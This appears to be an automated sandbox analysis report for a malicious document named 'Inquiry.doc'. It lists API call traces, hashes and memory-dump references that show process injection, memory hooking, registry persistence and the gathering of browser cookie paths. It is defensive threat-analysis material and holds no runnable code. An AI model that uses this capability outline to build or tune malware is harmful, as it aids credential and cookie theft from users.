    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:DA7FC1804FFFBD92337277B095147E63
Total matches:136
Initial sample Analysis ID:64193
Initial sample SHA 256:E999616249FE0433E41C5B578EFB3333A0DBFCF040B6DE1C8AFA4905C4B736A1
Initial sample name:Inquiry.doc

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
